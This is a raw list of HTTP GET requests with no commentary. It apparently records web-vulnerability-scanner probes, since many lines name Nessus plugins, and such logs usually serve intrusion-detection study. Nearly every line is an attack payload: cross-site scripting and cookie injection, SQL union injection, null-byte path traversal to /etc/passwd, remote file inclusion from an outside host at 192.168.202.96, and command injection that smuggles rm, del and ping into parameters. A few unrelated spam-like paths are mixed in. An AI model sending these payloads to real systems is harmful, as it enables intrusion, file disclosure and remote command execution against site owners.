GET /7dbjwpw6.idc?<script>cross_site_scripting.nasl</script>
GET /addvip.php?msetstr["progsdir"]=http://192.168.202.96:8080/swgnhpydbq0t?
GET /esmozg5d.dll?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /javascript/property.exe
GET /prescription-xanax/
GET /if69ddo1.php?<script>document.cookie="testiabz=5220;"</script>
GET /scripts/troops.cgi
GET /javascript/win32.exe
GET /javascript/compliance.exe
GET /scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,403538393,1441170175,1,1,1,1,1--&blogid=1
GET /phpmyadmin/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>
GET /examples/jsp/sessions/index.php?template=../../../loudblog/custom/config.php\x00
GET /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908691&lang_crm=../../vtigerservice.php\x00
GET /main.php?stuff="&del\x0cq27346825&rem\x0c
GET /9o6g5vkn.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /'stoked' gets to the heart of extreme athletics/
GET /0u75ldxq.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /examples/jsp/jsp2/jspx/config.php?path[docroot]=/etc/passwd\x00
GET /fmnveedu.idc?<meta http-equiv=set-cookie content="testgfbr=7014">
GET /help.php?q="&ping\x0c-w\x0c9000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c
GET /javascript/pii.exe
GET /javascript/ubb.exe
GET /j4drbkil.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /examples/jsp/jsp2/jspx/index.php?show=/etc/passwd
GET /1qwv2p5p.x?<script>document.cookie="testvqcy=252;"</script>
GET /scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/ipb5ri?
GET /main.php?stuff="&rm q23549573 #
GET /script pack/
GET /rpxyx07v.dll?<script>document.cookie="testbnli=1975;"</script>
GET /pohentermine-prescription/
GET /eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>
GET /ddoworrl.do?<script>document.cookie="testvlau=8517;"</script>
GET /megabook/admin.cgi?login=<script>alert('vulnerable')</script>
GET /initscripts/
GET /gazette-subscription/
GET /htbin/sensepost.exe?/c+dir
GET /bmeun223.idc?<meta http-equiv=set-cookie content="testhhwu=7044">
GET /examples/jsp/jsp2/jspx/showcat.php?cat=1'
GET /b5xdqgz2.idc?<img src="javascript:alert(cross_site_scripting.nasl);">a